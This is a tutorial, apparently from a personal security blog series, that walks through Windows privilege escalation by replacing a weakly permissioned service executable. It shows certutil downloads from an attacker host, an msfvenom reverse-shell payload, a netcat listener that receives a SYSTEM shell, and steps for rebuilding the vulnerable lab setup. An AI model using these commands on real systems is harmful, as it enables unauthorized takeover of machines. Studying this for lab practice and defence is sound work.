Windows Privilege Escalation
Understanding Windows privilege escalation is a key aspect of Cybersecurity. Privilege Escalation is a technique used by hackers to gain elevated privileges on a system. For security experts, knowing about this is important because it helps them find, exploit and fix any security vulnerabilities in their Windows systems.
This post is part of my Windows Privilege Escalation series that I’ve been posting. I’ll be uploading new content every week.
What are Weak Service File Permissions?
Service executables are files that run in the background and provide various services, such as handling network requests, printing documents, or monitoring system events. An insecure service executable is an executable file that has weak file permissions allowing it to be replaced with a malicious file. When the service is run, the malicious file will be run instead of the service executable. For this exploit to work, you need to have privileges to modify the service executable and figure out a way to make the service start or restart.
In cases where a modifiable service executable is running with the same privileges as the user you currently have a shell as, it is not considered insecure, as attempting to gain a reverse shell would not elevate your privileges, it would just return a shell with the same level of privileges that you already had.
Example: You have a user level shell as John and you found a service named service123 which is running an executable that can be replaced by John. The service service123 is also running with Administrator privileges. You replace the service executable with your own reverse shell executable. After replacing the service executable, the next step is to start/restart service123 which will run the malicious executable with Administrator privileges.
Demonstration
Tools used:
Winpeas.exe | accesschk.exe | msfvenom
Scenario: We have obtained a shell as the user mmorbius and must figure out a way to escalate my privileges.
First, bring over tools to enumerate the machine. Host a python webserver in Kali to transfer the tools.
python3 -m http.server 80
Then download the tool winpeas.exe to the Windows machine using the command line tool certutil.exe built into Windows. I used winpeas.exe A LOT while prepping for the OSCP, its a really handy tool for finding privilege escalation vulnerabilities in windows.
certutil.exe -urlcache -f http://<IP>/winpeas.exe winpeas.exe
Run winpeas.exe with the option “servicesinfo”. You can run it with no options but that makes the output pretty large so this option useful if you’re only looking for service vulnerabilities.
.\winpeas.exe servicesinfo
In the output above, we can see that there is a service named vulnserv that our current user can modify.
Checking what privileges the service is running with by doing sc qc vulnserv shows us this service is running with LocalSystem privileges. The executable the service is running is located in C:\Services\vulnerable.exe.
sc qc vulnserv
Then download accesschk.exe to the Windows machine using certutil.exe and used it to check the permissions mmorbius had on the vulnerable service
certutil.exe -urlcache -f http://<IP>/accesschk.exe accesschk.exe
As you can see below, mmorbius has FILE_ALL_ACCESS to the service executable.
accesschk.exe /accepteula -quvw C:\Services\vulnerable.exe
Now that we know we have permissions to modify the executable, the next step is to replace the vulnerable executable with our own reverse shell executable.
Create the reverse shell executable using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=53 -f exe > reverse.exe
Copy the reverse shell to the windows machine
certutil.exe -urlcache -f http://<IP>/reverse.exe reverse.exe
Create a backup of the service executable before copying the reverse shell to the location of the service executable. Make sure to name the reverse shell executable the same as the service executable.
move C:\Services\vulnerable.exe vulnerable.exe.bak
move reverse.exe C:\Services\vulnerable.exe
Start a netcat listener on whichever port you specified in msfvenom
nc -lnvp 53
Now do “net start vulnserv” to start the service with the new executable in place.
net start vulnserv
Back on the netcat listener, there should be a shell with NT Authority/SYSTEM
Recreate Vulnerability
Tools used: subinacl.exe
First, create the service as an Admin. To do this you need a cmd shell as an Admin.
sc.exe create vulnserv binPath="C:\Services\vulnerable.exe"
An executable named “vulnerable.exe” placed in C:\Services will be executed when vulnserv is ran.
The next step was to grant a user permissions to modify the service. There is a tool called SubinACL.exe which let will let you modify the service permissions.
Use subinacl.exe to give the the user mmorbius permissions to modify the service
subinacl.exe /service vulnserv /grant=mmorbius=PTOC
